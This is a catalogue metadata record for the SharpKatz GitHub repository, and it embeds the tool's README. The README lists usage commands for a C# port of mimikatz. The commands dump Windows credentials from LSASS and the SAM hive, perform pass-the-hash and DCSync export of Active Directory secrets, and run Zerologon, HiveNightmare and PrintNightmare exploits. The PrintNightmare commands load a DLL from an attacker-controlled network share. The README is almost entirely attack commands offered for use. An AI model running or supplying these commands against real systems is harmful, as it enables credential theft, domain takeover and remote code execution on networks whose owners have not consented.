{"id":13840586,"url":"https://github.com/b4rtik/SharpKatz","last_synced_at":"2025-07-11T09:32:25.162Z","repository":{"id":37449558,"uuid":"265322499","full_name":"b4rtik/SharpKatz","owner":"b4rtik","description":"Porting of mimikatz sekurlsa::logonpasswords,  sekurlsa::ekeys and lsadump::dcsync commands","archived":false,"fork":false,"pushed_at":"2021-11-07T21:29:22.000Z","size":623,"stargazers_count":950,"open_issues_count":4,"forks_count":133,"subscribers_count":26,"default_branch":"master","last_synced_at":"2024-08-05T17:25:17.434Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/b4rtik.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-05-19T17:56:46.000Z","updated_at":"2024-08-02T02:54:09.000Z","dependencies_parsed_at":"2022-07-12T16:18:03.500Z","dependency_job_id":null,"html_url":"https://github.com/b4rtik/SharpKatz","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/b4rtik%2FSharpKatz","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/b4rtik%2FSharpKatz/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/b4rtik%2FSharpKatz/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/b4rtik%2FSharpKatz/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/b4rtik","download_url":"https://codeload.github.com/b4rtik/SharpKatz/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositori
es_count":225712519,"owners_count":17512419,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:00:50.680Z","updated_at":"2024-11-21T10:30:27.028Z","avatar_url":"https://github.com/b4rtik.png","language":"C#","readme":"# SharpKatz\nPorting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands\n\n## Usage\n\n### Ekeys\n\n```SharpKatz.exe --Command ekeys```\u003cbr\u003e\nList Kerberos encryption keys \u003cbr\u003e\n\u003cbr\u003e\n\n### Msv\n\n```SharpKatz.exe --Command msv``` \u003cbr\u003e\nRetrieve user credentials from Msv provider \u003cbr\u003e\n\u003cbr\u003e\n\n### Kerberos\n\n```SharpKatz.exe --Command kerberos```\u003cbr\u003e\nRetrieve user credentials from Kerberos provider \u003cbr\u003e\n\u003cbr\u003e\n\n### Tspkg\n\n```SharpKatz.exe --Command tspkg```\u003cbr\u003e\nRetrieve user credentials from Tspkg provider \u003cbr\u003e\n\u003cbr\u003e\n\n### Credman\n\n```SharpKatz.exe --Command credman```\u003cbr\u003e\nRetrieve user credentials from Credman provider \u003cbr\u003e\n\u003cbr\u003e\n\n### WDigest\n\n```SharpKatz.exe --Command wdigest```\u003cbr\u003e\nRetrieve user credentials from WDigest provider \u003cbr\u003e\n\u003cbr\u003e\n\n### Logonpasswords\n\n```SharpKatz.exe --Command logonpasswords```\u003cbr\u003e\nRetrieve user credentials from all providers \u003cbr\u003e\n\u003cbr\u003e\n\n### List shadowcopies\n\n```SharpKatz.exe --Command listshadows```\u003cbr\u003e\nEnumerate shadowcopies with NtOpenDirectoryObject and NtQueryDirectoryObject\u003cbr\u003e\n\u003cbr\u003e\n\n### 
Lsadumpsam\n\n```SharpKatz.exe --Command dumpsam --System \\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy1\\\\Windows\\\\System32\\\\config\\\\SYSTEM --Sam \\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy1\\\\Windows\\\\System32\\\\config\\\\SAM```\u003cbr\u003e\nDump credential from provided sam database\u003cbr\u003e\n\u003cbr\u003e\n\n### Pth\n\n```SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash```\u003cbr\u003e\nPerform pth to create a process under userdomain\\username credential with ntlm hash of the user's password\u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command pth --User username --Domain userdomain --Rc4 rc4key```\u003cbr\u003e\nPerform pth to create a process under userdomain\\username credential with the user's rc4 key\u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command pth --Luid luid --NtlmHash ntlmhash```\u003cbr\u003e\nReplace ntlm hash for an existing logonsession \u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash --aes256 aes256```\u003cbr\u003e\nPerform pth to create a process under userdomain\\username credential with ntlm hash of the user's password and aes256 key \u003cbr\u003e\n\u003cbr\u003e\n\n### DCSync\n\n```SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc```\u003cbr\u003e\nDump user credential by username \u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc```\u003cbr\u003e\nDump user credential by GUID \u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc```\u003cbr\u003e\nExport the entire dataset from AD to a file created in the current user's temp folder\u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword 
authuserpassword```\u003cbr\u003e\nDump user credential by username using alternative credentials\u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword```\u003cbr\u003e\nDump user credential by GUID using alternative credentials\u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword```\u003cbr\u003e\nExport the entire dataset from AD to a file created in the current user's temp folder using alternative credentials\u003cbr\u003e\n\u003cbr\u003e\n\n### Zerologon\n\nNo reference to logoncli.dll; using the direct RPC call works even from a [non-domain joined workstation](https://twitter.com/gentilkiwi/status/1306178689630076929)\n\n```SharpKatz.exe --Command zerologon --Mode check --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$```\u003cbr\u003e\nPerform Zerologon check \u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command zerologon --Mode exploit --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$```\u003cbr\u003e\nPerform Zerologon attack \u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --User krbtgt --DomainController WIN-NSE5CPCP07C.testlab2.local```\u003cbr\u003e\nPerform Zerologon attack and dump user credential by username \u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --Guid guid --DomainController WIN-NSE5CPCP07C.testlab2.local```\u003cbr\u003e\nPerform Zerologon attack and dump user credential by GUID \u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command zerologon --Mode auto 
--Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --DomainController WIN-NSE5CPCP07C.testlab2.local```\u003cbr\u003e\nPerform Zerologon attack and export the entire dataset from AD to a file created in the current user's temp folder\u003cbr\u003e\n\u003cbr\u003e\nNote: Do not use zerologon in a production environment or at least plan for recovery actions which are detailed [here](https://github.com/dirkjanm/CVE-2020-1472) \n\n### PrintNightmare CVE-2021-1675 - CVE-2021-34527\n\n```SharpKatz.exe --Command printnightmare --Target dc --Library \\\\\\\\mycontrolled\\\\share\\\\fun.dll```\u003cbr\u003e\nPerform PrintNightmare attack \u003cbr\u003e\n\u003cbr\u003e\n```SharpKatz.exe --Command printnightmare --Target dc --Library \\\\\\\\mycontrolled\\\\share\\\\fun.dll --AuthUser user --AuthPassword password --AuthDomain dom```\u003cbr\u003e\nPerform PrintNightmare attack with provided credentials\u003cbr\u003e\n\u003cbr\u003e\n\n### HiveNightmare CVE-2021-36934\n\n```SharpKatz.exe --Command hiveghtmare```\u003cbr\u003e\nExploit HiveNightmare vulnerability selecting the first available shadowcopy \u003cbr\u003e\n\u003cbr\u003e\n\n\n## Credits\n\nThis project depends entirely on the work of [Benjamin Delpy](https://twitter.com/gentilkiwi) and [Vincent Le Toux](https://twitter.com/mysmartlogon) on [Mimikatz](https://github.com/gentilkiwi/mimikatz) and [MakeMeEnterpriseAdmin](https://raw.githubusercontent.com/vletoux/MakeMeEnterpriseAdmin/master/MakeMeEnterpriseAdmin.ps1) projects.\u003cbr\u003e\nThe analysis of the code was conducted following the example from [this blog post](https://blog.xpnsec.com/exploring-mimikatz-part-1/) by [xpn](https://twitter.com/_xpn_).\u003cbr\u003e\n\u003cbr\u003e\n","funding_links":[],"categories":["C# (212)","C# #","Operating 
Systems"],"sub_categories":["Windows"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fb4rtik%2FSharpKatz","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fb4rtik%2FSharpKatz","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fb4rtik%2FSharpKatz/lists"}